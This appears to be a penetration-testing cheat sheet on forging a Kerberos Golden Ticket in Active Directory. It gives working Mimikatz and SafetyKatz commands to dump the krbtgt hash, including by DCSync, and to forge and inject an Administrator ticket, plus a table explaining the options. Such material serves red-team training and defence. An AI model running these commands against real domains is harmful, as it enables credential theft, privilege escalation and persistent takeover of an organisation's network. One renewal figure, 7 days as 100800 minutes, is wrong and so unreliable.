Golden Ticket

Golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket.

Using Golden ticket can be used to impersonate any user with any privileges.

Obtain krbtgt hash

There are multiple ways to get the krbtgt account hash

# Execute on DC as Domain Admin
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# DCSync to get AES keys
# Needs Domain admin or Replication Rights
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<user_sid> /aes256:<aes_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

dir \\dcorp-dc\c$ # check if worked

Options
kerberos::golden	Name of the module
/User:Administrator	Username for which the TGT is generated
/domain:	Domain FQDN
/sid:	SID of the domain
/aes256:	AES256 keys of the krbtgt account
/id:500 /groups:512	Optional User and Group RID
/ptt or /ticket	ptt: inject ticket to current process ticket: saves ticket to a file
/startoffset:0	Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.
/endin:600	Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes
/renewmax:10080	Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800